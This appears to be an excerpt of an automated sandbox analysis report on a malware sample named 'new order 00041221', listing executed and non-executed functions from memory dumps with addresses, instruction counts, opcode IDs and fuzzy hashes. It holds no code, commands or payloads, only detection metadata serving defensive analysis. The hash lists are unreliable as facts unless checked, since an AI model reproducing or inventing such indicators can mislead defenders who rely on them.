                                            • Opcode Fuzzy Hash: 8351f7986d47f9ee80c20893f1aeafb282d5f431699a064e5ed4b3e7d67e3062
                                            • Instruction Fuzzy Hash: EDE0C2304483229FCB93ABB0E8044E93F76AB8212070087A1E4014E15EDBB45C4ECB21
                                            Function 012728B0 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c136f867ce349979073310a5262657c6e13693d20260a604b8a888be2199afd
                                            • Instruction ID: 37566068d83185f0e4326393310b650fe23c4ddc421d9b9b98e4168d4d22c869
                                            • Opcode Fuzzy Hash: 7c136f867ce349979073310a5262657c6e13693d20260a604b8a888be2199afd
                                            • Instruction Fuzzy Hash: 7AD05B31D2032A57CB10E7A5DC048DFFB38EED6321B904626D52437144FB706659C6E1
                                            Function 01278EF8 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 17f2bf72fba5baf27ad71e17f23193fe14cf8bcf8a90a73ae941b19530a785d4
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: 7EC08C3361C1282BA235104E7C49EB3BB8DC3C23B4BA10137FB1CD3200AC929C8001FA
                                            Function 0127AFAD Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ab0c6a651230b2410571c2893420a2ccd9d561e03a8e3c30b76ea75737fffa9
                                            • Instruction ID: 64a10ada50c7786d13c4e58375336aa494522e2898cacddfcc62955ca54235b6
                                            • Opcode Fuzzy Hash: 0ab0c6a651230b2410571c2893420a2ccd9d561e03a8e3c30b76ea75737fffa9
                                            • Instruction Fuzzy Hash: 7CD0673AB00008DFCB149F98E8449DDF7B6FB98221B448116E915A7264C6319965DB64
                                            Function 01276748 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8525bbd01aad4137e9159a9959d1c64102e4f336c19535bc78c8dfbf9e557433
                                            • Instruction ID: 1a849493cc556cb2d4b2af53b1de216a8c2c4226d719b7cf515eb31b2c9769eb
                                            • Opcode Fuzzy Hash: 8525bbd01aad4137e9159a9959d1c64102e4f336c19535bc78c8dfbf9e557433
                                            • Instruction Fuzzy Hash: 55C012345003254FDA51F766FC4456A376AA7D01017408B20A0050D24EDF74284E5795

                                            Non-executed Functions

                                            Function 05A30040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5r
                                            • API String ID: 0-750816051
                                            • Opcode ID: 03a9c75def3ae7953be29cf7e9c8234f786af2dd7ae5ff971de45751d5a48a78
                                            • Instruction ID: 5218380383ec4e4b700774833f628e35d7a1dabd6fcf993eb8fe5c6e391b6c62
                                            • Opcode Fuzzy Hash: 03a9c75def3ae7953be29cf7e9c8234f786af2dd7ae5ff971de45751d5a48a78
                                            • Instruction Fuzzy Hash: 6552AD74E01229CFDB64DF69C984B9EBBB2BB89304F1085E9E409A7354DB319E85CF50
                                            Function 05A30B30 Relevance: .7, Instructions: 709COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d34523f0838b2268d8797e707870f056aec688610afeabf0bef7effc0ad7c15b
                                            • Instruction ID: d55a699bc904b239c23e326c7b22d1121b65ded9fe983dc5bb65028032c9514c
                                            • Opcode Fuzzy Hash: d34523f0838b2268d8797e707870f056aec688610afeabf0bef7effc0ad7c15b
                                            • Instruction Fuzzy Hash: A472CE74E042288FDB64DF69C985BEDBBB2BB49304F1481E9E409A7355DB30AE81CF40
                                            Function 0127F7F1 Relevance: .3, Instructions: 272COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf2085979676164f555c96a99fb550afc19e0dbe3ba2eb72ec9ec786ba32faf5
                                            • Instruction ID: 3ed7d8a8a943dc4311a8c2a5e875ead4c864fd4c407c22efef903d9ae907ad1a
                                            • Opcode Fuzzy Hash: bf2085979676164f555c96a99fb550afc19e0dbe3ba2eb72ec9ec786ba32faf5
                                            • Instruction Fuzzy Hash: 29C1B474E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A3F1C8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a811fdc480e41db03121790cf3e076c96ba15796e1e82afa4fb48a4fe092b141
                                            • Instruction ID: e8c7ac6cff67901bc39e55ebdf23c76354755df12c74ad2c25469de1506eeed8
                                            • Opcode Fuzzy Hash: a811fdc480e41db03121790cf3e076c96ba15796e1e82afa4fb48a4fe092b141
                                            • Instruction Fuzzy Hash: BAC1A278E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A3E918 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c19ae8755e316630b671d8f3a48e622f1e9e2323eb13f2f03823d5687db7c756
                                            • Instruction ID: c347ffe1aaf14101e5bf6f9d2d4fc22edf8d638cb844fbf62499a7c76ef62581
                                            • Opcode Fuzzy Hash: c19ae8755e316630b671d8f3a48e622f1e9e2323eb13f2f03823d5687db7c756
                                            • Instruction Fuzzy Hash: C7C1B278E00218CFDB54DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A32970 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eda1ea47635e14b02284b447e784e968eaec3b86c78e672b5e4f355cf88756fe
                                            • Instruction ID: 3dfd51c935f4e7fc916f63f3915f8791dcfeb24d567fb0c02fad91da18983977
                                            • Opcode Fuzzy Hash: eda1ea47635e14b02284b447e784e968eaec3b86c78e672b5e4f355cf88756fe
                                            • Instruction Fuzzy Hash: 5FC1C278E00218CFDB24DFA5D954B9DBBB2BF88305F2081A9D819AB354DB355E85CF50
                                            Function 05A3ED70 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a7e1b2bb516c80f4a7b3c514466ff775f4a566e5099ef327c3e4c3bdb9b171f
                                            • Instruction ID: 561f0009e6a577671944f3faba2a0cb9a61412d50de62805c7f60e7ada7a4393
                                            • Opcode Fuzzy Hash: 0a7e1b2bb516c80f4a7b3c514466ff775f4a566e5099ef327c3e4c3bdb9b171f
                                            • Instruction Fuzzy Hash: A8C1A278E00218CFDB14DFA5D954BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A3E4C0 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94027cc53e8721c0e6acd2e99b9aa3a89804b825a21a6bafe94f429483f3e410
                                            • Instruction ID: 9ce560a738ae05b5f1bb2c0ac5ce30f7ceb816ec8a88868bcbe21d0ad1f9e6ea
                                            • Opcode Fuzzy Hash: 94027cc53e8721c0e6acd2e99b9aa3a89804b825a21a6bafe94f429483f3e410
                                            • Instruction Fuzzy Hash: 83C1B278E01218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A3DC10 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7100d0c621be6d4e048fb07a5e0efd234438c315a86f7ca46947e98e10459bc9
                                            • Instruction ID: a68525bdf116d34530fbba12fa765a6bffac2f54caf5cb0ef8500e7ac815a695
                                            • Opcode Fuzzy Hash: 7100d0c621be6d4e048fb07a5e0efd234438c315a86f7ca46947e98e10459bc9
                                            • Instruction Fuzzy Hash: C4C1B378E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A3E068 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04db2e7ca7410a739569769581d7821ace878804b346077503dbac3b4256208b
                                            • Instruction ID: 22f4c67fe8b4136ecc7f0704c9c94355084eb034ae9b41436f81e13cdc49eb7a
                                            • Opcode Fuzzy Hash: 04db2e7ca7410a739569769581d7821ace878804b346077503dbac3b4256208b
                                            • Instruction Fuzzy Hash: 8FC1A278E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A3D7B8 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d79bbbba0a0f59b1be43f88d2f1fff5823ebe7bf52a9ddf9c02e876adb7c2ed8
                                            • Instruction ID: fb7253bf77b5671bb7d09c1585c701e37988c6448ce84bd1a65dc5a0a5d7f5fb
                                            • Opcode Fuzzy Hash: d79bbbba0a0f59b1be43f88d2f1fff5823ebe7bf52a9ddf9c02e876adb7c2ed8
                                            • Instruction Fuzzy Hash: 5DC1B378E00218CFDB14DFA5D954BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A3CF08 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66274e466c396398f06858f3893c8c60bd2bacb2972489132f6f4595c64390b3
                                            • Instruction ID: 8deeb0d5831153cd40048c23233b607064bc637e144f5482ec4206fe15a9ecc0
                                            • Opcode Fuzzy Hash: 66274e466c396398f06858f3893c8c60bd2bacb2972489132f6f4595c64390b3
                                            • Instruction Fuzzy Hash: 9EC1A178E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A3D360 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71fa76c250eb7aacd2e69e0905efd0c435ce806a35bb5d544ef88feccb07b750
                                            • Instruction ID: 0e49d2c18b5273e5e2ceba413ea4fd864ecea430a48ea17fa83fb93d9a79bb1b
                                            • Opcode Fuzzy Hash: 71fa76c250eb7aacd2e69e0905efd0c435ce806a35bb5d544ef88feccb07b750
                                            • Instruction Fuzzy Hash: 05C1B378E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A3F620 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ccd07f913c85438734120b2559d0ae995d408d17061b266f510563dd08c109fb
                                            • Instruction ID: 0c62e5601445ef7cef88ea940b419d69f8d50fe0469cab6f9a17731242513b43
                                            • Opcode Fuzzy Hash: ccd07f913c85438734120b2559d0ae995d408d17061b266f510563dd08c109fb
                                            • Instruction Fuzzy Hash: E0C1B278E00218CFDB14DFA5D994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Function 05A3FA78 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51b6c6d6075d563e37d80ce9e3ab46d020690e96c40f5b13dc72f0f9e2551df8
                                            • Instruction ID: 49066fd92bc5fefcc4d25fa1c8cd26c532074e67e51274f7d044942252d474d6
                                            • Opcode Fuzzy Hash: 51b6c6d6075d563e37d80ce9e3ab46d020690e96c40f5b13dc72f0f9e2551df8
                                            • Instruction Fuzzy Hash: D4C1B378E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Function 05A32DC0 Relevance: .2, Instructions: 221COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02fd121b3cfdaddb7543902b17584e5fc96f72f3f7f81ff4263e1b3ca1a07db5
                                            • Instruction ID: c9c1a285aed1c31a97370def8b7bd1ce27888dc31dbaf4d0f3e351a4c4673e6e
                                            • Opcode Fuzzy Hash: 02fd121b3cfdaddb7543902b17584e5fc96f72f3f7f81ff4263e1b3ca1a07db5
                                            • Instruction Fuzzy Hash: 70A11674D00208CFEB24DFA9C945B9DBBB1FF88304F20826AE409AB391DB759985CF55
                                            Function 05A32DD0 Relevance: .2, Instructions: 220COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51718158846c44f23518ffa4af0c0cc389660d82a431143a3175e88e9a3c0fe8
                                            • Instruction ID: 09691a59ba01c66d0aee0300fea5fedd9bbdcd7a58eed2cb26f8532ce9fe0eef
                                            • Opcode Fuzzy Hash: 51718158846c44f23518ffa4af0c0cc389660d82a431143a3175e88e9a3c0fe8
                                            • Instruction Fuzzy Hash: 36A11674D00208CFEB24DFA9C945B9DBBB1FF48304F20826AE419AB3A1DB759985CF55
                                            Function 05A33116 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9714dc09755f7bcc09ac40b27c1b8b083be86d878109da6dd0ff77a9119101e1
                                            • Instruction ID: e99dbaeb9bc19471397b274f05c6f854432a19c0d0d555c4f8ac155cd838a6b7
                                            • Opcode Fuzzy Hash: 9714dc09755f7bcc09ac40b27c1b8b083be86d878109da6dd0ff77a9119101e1
                                            • Instruction Fuzzy Hash: 4B910374D04208CFEB10DFA9C989B9CBBF1FF49314F20826AE409AB291DB759985CF55
                                            Function 05A30673 Relevance: .2, Instructions: 193COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 764326fb22ebefc56483defedc796c88e68354084f581bde2a91b121e6266193
                                            • Instruction ID: 9ae2c262a52a8dfaba5f23f18d89a972d8697ea70b20570b3cf6839242d51159
                                            • Opcode Fuzzy Hash: 764326fb22ebefc56483defedc796c88e68354084f581bde2a91b121e6266193
                                            • Instruction Fuzzy Hash: FEA19B74E01228CFDB65DF24C894BAABBB2BF49301F5085EAE409A7350DB319E81CF51
                                            Function 0127F150 Relevance: .2, Instructions: 150COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a8b224be3ad430718e818ae25c6952b3445d591767cdc32587c495be62050ec
                                            • Instruction ID: d9db00367e240e1dd1e765f386b642268d6ff13728ab2fae552b7d83f794eade
                                            • Opcode Fuzzy Hash: 5a8b224be3ad430718e818ae25c6952b3445d591767cdc32587c495be62050ec
                                            • Instruction Fuzzy Hash: 3D515674D15209CFEB04EFA9D6487EEBBB2FF89300F248229D410AB298D7759985CF54
                                            Function 0127F33C Relevance: .1, Instructions: 146COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75db9733ead541970a93f5e9ffaa7beb5d6b36c444ec49290be7f7d095746ca2
                                            • Instruction ID: 293e080a813690fa59e8c3f43278ed240c0f9ef1bcd087caef5d4191571fab99
                                            • Opcode Fuzzy Hash: 75db9733ead541970a93f5e9ffaa7beb5d6b36c444ec49290be7f7d095746ca2
                                            • Instruction Fuzzy Hash: 02513634D29209CFDB10EFA8D6887EEBBB1FF49300F648219D425AB284D7759981CF54
                                            Function 05A30853 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e293ba93b55e5769d5d0f9e8ed4f25e7b0498f303e637d119b008b32b6d7e922
                                            • Instruction ID: 2d3560c2edd61250be438678718e21d6e554877326236883a9c282835a15cca7
                                            • Opcode Fuzzy Hash: e293ba93b55e5769d5d0f9e8ed4f25e7b0498f303e637d119b008b32b6d7e922
                                            • Instruction Fuzzy Hash: A1519474A01229DFCB65DF24D854BA9BBB2FF49301F5085EAE40AA7354DB31AE81CF50